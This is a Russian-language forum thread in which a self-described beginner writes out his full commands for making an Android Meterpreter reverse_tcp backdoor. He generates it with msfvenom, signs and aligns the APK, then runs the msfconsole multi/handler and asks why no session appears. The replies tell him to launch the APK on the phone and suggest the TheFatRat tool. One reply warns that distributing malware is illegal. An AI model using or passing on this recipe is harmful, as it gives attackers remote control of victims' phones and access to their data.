Please help. Всю голову сломал msfconsole/handler!!!

Discussion in 'Linux, Freebsd, *nix' started by starscrime, 2 Oct 2017.

  1. starscrime

    starscrime New Member

    Joined:
    2 Oct 2017
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    В общем такая проблема. Пытаюсь для android сделать полезную нагрузку.
    Может кто по полкам разложить правильно я делаю или нет, потому как в итоге ни хрена я не могу подключиться.
    В общем делаю так
    1) msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.66 LPORT=4444 R > 1.apk - IP указываю своего компа с которого и будет запускаться msf (если что не правильно поправьте пожалуйста, правильно ли я понимаю что IP нужен моего компа с которого будет производится атака)
    2. Создаю хранилище ключей -----> keytool -genkey -v -keystore my-release-key.Keystore -alias app -keyalg RSA -keysize 2048 -validity 10000
    3. Подписываю файл -----> jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore 1.apk app
    4. Проверяю APK --- jarsigner -verify -verbose -certs /root/MyPath/my0704.apk
    5. Оптимизирую файл ------> zipalign -v 4 1.apk 01.apk
    Закидываю файл на телефон, устанавливаю. Ну и ...
    6. msfconsole
    7. use exploit/multi/handler
    8. set PAYLOAD android/meterpreter/reverse_tcp
    9. set LHOST 192.168.1.66 (указываю опять IP с которого производится атака)
    10. set RHOST 4444
    11. exploit
    и msf выдает вот такую хрень
    msf exploit(handler) > exploit
    [*] Exploit running as background job 5.

    [*] Started reverse TCP handler on 192.168.1.66:4444
    но в итоге ни чего не происходит!!!!
    пишу sessions -i
    и пишет что ----> No Active sessions.
    ВОПРОС ПОЧЕМУ!!!!! ЧТО НИ ТАК СДЕЛАЛ?
    Комп и телефон работают через sercomm AP с WIFI телефон android 5.1.1 имеет IP 192.168.1.71
    Подскажите пожалуйста к чему и как правильно сделать.
    Прошу сильно не пинать так как я только учусь)))
    СПАСИБО
     
  2. DmitryU

    DmitryU Member

    Joined:
    20 Jan 2012
    Messages:
    68
    Likes Received:
    58
    Reputations:
    1
    Десятый пункт это что?

    А так все правильно, работает. Собственно может приложение на телефоне остановлено?
     
  3. nikbim96

    nikbim96 Member

    Joined:
    16 Jan 2014
    Messages:
    112
    Likes Received:
    22
    Reputations:
    1
    А запускать не пробовал свой apk на телефон который скачал? Мне кажется он на телефоне твоём не запущено просто, вот и нету сессий, кстати можешь попробовать Thefatrat многие школяры его во всю используют в windows, android, mac. Мне даже смс(кой) подобную шляпу отправлял один такой деятель, правда антивирус его раньше запинать успел чем я его скачать. Кстати имей в виду что за распространение Malware статья есть в УК РФ, на тот случай если ты не знал могут жестко от иметь.